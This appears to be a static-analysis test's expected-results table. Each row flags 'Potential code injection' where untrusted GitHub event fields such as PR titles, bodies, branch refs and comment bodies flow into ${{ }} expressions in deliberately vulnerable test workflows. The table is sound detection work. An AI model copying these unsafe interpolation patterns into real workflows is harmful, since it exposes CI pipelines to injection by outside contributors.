| .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | 